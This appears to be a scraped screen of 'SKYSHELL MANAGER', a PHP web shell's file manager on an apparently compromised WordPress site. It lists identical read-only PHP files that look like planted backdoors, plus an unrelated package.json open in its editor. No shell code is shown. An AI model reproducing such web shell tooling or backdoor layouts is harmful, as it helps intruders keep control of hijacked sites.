📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "union-value", "description": "Set an array of unique values as the property of an object. Supports setting deeply nested properties using using object-paths/dot notation.", "version": "2.0.1", "homepage": "https://github.com/jonschlinkert/union-value", "author": "Jon Schlinkert (https://github.com/jonschlinkert)", "repository": "jonschlinkert/union-value", "bugs": { "url": "https://github.com/jonschlinkert/union-value/issues" }, "license": "MIT", "files": [ "index.js" ], "main": "index.js", "engines": { "node": ">=6" }, "scripts": { "test": "mocha" }, "dependencies": { "get-value": "^3.0.1", "set-value": "^3.0.0" }, "keywords": [ "array", "dot", "get", "has", "nested", "notation", "object", "path", "prop", "property", "set", "union", "value" ], "verb": { "toc": false, "layout": "default", "tasks": [ "readme" ], "plugins": [ "gulp-format-md" ], "related": { "list": [ "assign-value", "get-value", "has-value", "set-value", "unset-value" ] }, "lint": { "reflinks": true } }, "devDependencies": { "gulp-format-md": "^2.0.0", "mocha": "^6.1.4" } }
Save